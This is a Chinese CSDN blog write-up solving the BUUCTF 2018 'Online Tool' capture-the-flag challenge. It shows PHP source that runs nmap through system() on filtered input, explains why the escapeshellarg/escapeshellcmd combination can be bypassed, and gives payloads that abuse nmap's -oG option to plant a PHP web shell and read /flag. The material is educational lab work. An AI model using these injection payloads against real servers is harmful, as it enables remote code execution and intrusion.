buuctf-[BUUCTF 2018]Online Tool(小宇特详解)

最新推荐文章于 2022-07-04 08:16:06 发布
最新推荐文章于 2022-07-04 08:16:06 发布
阅读量3k 收藏 1
点赞数 1
分类专栏: buuctf 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122852540
版权

buuctf-[BUUCTF 2018]Online Tool(小宇特详解)

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

这里的escapeshellarg作用是:1,确保用户值传递一个参数给命令2,用户不能指定更多的参数3,用户不能执行不同的命令

escapeshellcmd的作用是:1,确保用户只执行一个命令2,用户可以指定不限数量的参数3,用户不能执行不同的命令

我们通过get方式进行对host的传参

这里需要我们构造能够得到flag的host语句

这里查看RCE漏洞的原理

http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/

用我的话来说

escapeshellarg处理后先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

127.0.0.1’ -oG经过 escapeshellarg处理后就变成了'127.0.0.1'\'' -oG ' 也就是发现单引号进行转义,且以它为中心分割为三部分(在两边加单引号) 。

随后在进经过escapeshellcmd 时变成:'127.0.0.1'\\'' -oG \'也就是将不成对的单引号及任意\进行添加\的操作。

而此时我们想得到shell需要写入一个shell文件我们想要正常执行<?php phpinfo(); ?> -oG 1.php但是经过上面的函数处理后变成了一个被单引号包围的字符串,不会当命令去执行,这里我们需要闭合一个单引号。

nmap有一个参数-oG可以实现将命令和结果写到文件

所以我们可以控制自己的输入写入文件,这里我们可以写入一句话木马链接,也可以直接命令 cat flag

查看phpinfo()

?host=' <?php echo phpinfo();?> -oG 1.php '

查看flag

?host=' <?php echo `cat /flag`;?> -oG test.php '

这里注意用反引号cat /flag

小宇特详解
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[BUUCTF 2018]Online Tool
m0_62092622的博客
04-15 418
打开是源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; //escapeshellarg — 把字符串转码为
[BUUCTF 2018]Online Tool1
最新发布
m0_73673698的博客
06-08 603
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义…
[BUUCTF 2018]Online Tool 1
qq_43618536的博客
07-04 726
BUUCTF的[BUUCTF 2018]Online Tool 1
qt-unified-windows-x86-online.exe
07-14
"qt-unified-windows-x86-online.exe" 是一个用于Windows 32位系统的QT在线安装程序,它提供了方便的方式来下载和安装QT开发环境。 这个安装程序的核心功能包括: 1. **集成安装器**:qt-unified-windows-x86-on...
jeecg-boot-2.1 Online表单 增量升级SQL
08-28
jeecg-boot-2.1 Online表单升级SQL jeecg-boot是一款基于代码生成器的JAVA快速开发平台!采用最新技术,前后端分离架构:SpringBoot 2.x,Ant Design&Vue;,Mybatis,Shiro,JWT。强大的代码生成器让前后端代码一键...
qt-unified-windows-x64-4.6.0-online.exe
03-05
qt-unified-windows-x64-4.6.0-online.exe安装包及国内映射源地址。安装速度快,给赶时间的网友。解压安装,把脚本代码复制到cmd种回车即可。 qt-unified-windows-x64-4.6.0-online.exe安装包及国内映射源地址。安装...
Qt-unified-windows-x64-4.6.0-online安装Qt
07-31
在本主题中,我们将详细介绍如何使用"Qt-unified-windows-x64-4.6.0-online"进行Qt在Windows 64位环境下的在线安装。 1. **Qt Installer Framework**: "Qt-unified-windows-x64-4.6.0-online.exe" 是基于Qt ...
a-react-app-example-online-test-2018
05-31
React 应用程序示例概述在我们深入研究并开始处理 React 项目的特定部分之前,让我们先看一个简单的 React 应用程序,以便我们能够从更高的层次上理解它。 在本课中,我们将从一个基本的 React 应用程序开始,检查...
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3774
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 336
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
BUUCTF WEB [BUUCTF 2018]Online Tool
Y1da的博客
04-22 1507
BUUCTF WEB [BUUCTF 2018]Online Tool 进入环境,得到一段代码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
line tool C++
05-24
Line tool in C++ can be implemented using the Bresenham's line algorithm. Here's an example implementation: ```c++ #include <iostream> #include <cmath> using namespace std; void drawLine(int x1, int y1, int x2, int y2) { int dx = abs(x2 - x1); int dy = abs(y2 - y1); int sx = x1 < x2 ? 1 : -1; int sy = y1 < y2 ? 1 : -1; int err = dx - dy; while (x1 != x2 || y1 != y2) { cout << "(" << x1 << ", " << y1 << ")" << endl; int e2 = err * 2; if (e2 > -dy) { err -= dy; x1 += sx; } if (e2 < dx) { err += dx; y1 += sy; } } cout << "(" << x2 << ", " << y2 << ")" << endl; } int main() { drawLine(1, 1, 8, 5); return 0; } ``` This implementation takes the coordinates of two points (`x1`, `y1`) and (`x2`, `y2`) and draws a line between them using the Bresenham's algorithm. The algorithm calculates the slope and direction of the line and then iteratively calculates the coordinates of the points that lie on the line. The `drawLine` function prints the coordinates of each point on the line to the console.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值